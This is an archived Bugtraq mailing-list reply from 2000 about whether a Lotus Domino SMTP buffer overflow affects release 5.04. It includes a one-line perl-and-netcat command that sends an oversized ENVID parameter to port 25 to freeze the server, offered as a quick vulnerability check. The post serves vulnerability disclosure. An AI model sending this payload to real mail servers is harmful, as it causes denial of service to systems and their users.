[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server

To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server
From: Fyodor <fygrave@SCORPIONS.NET>
Date: Mon, 6 Nov 2000 03:27:40 -0500

> However, Lotus Notes/Domino Release 5.0.4 QMR fix list indicates that
> the problem was already fixed in 5.04.
>
> See
> 
>http://www.support.lotus.com/sims2.nsf/802ee480bdd32d0b852566fa005acf8d/191a4daad1890947852569580069a59d?OpenDocument&Highlight=2,ENVID
>
> and click on
> Mail Server - Router - SMTP
>
> The SPR# is CDOY4GFP35
>
> Are you sure 5.04 is affected?  Or the technote is lying?
>

Well, at least eval. version for linux platform is vulnerable.
if you want to be confident whether it affects your server or not
 here's a small hint to play around : :-)

perl -e 'print "ehlo foo\nmail from:blah@yahoo.com\nrcpt to:admin@localhost  
ENVID=", "A"x900;' | nc lotus.box 25

or something like that.. :)
if all your lotus services get frozen afterwards, you are vulnerable.


-Fyodor

Prev by Date: Re: vulnerability in mail.local
Next by Date: Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server
Prev by thread: Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server
Next by thread: Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server
Index(es):
- Date
- Thread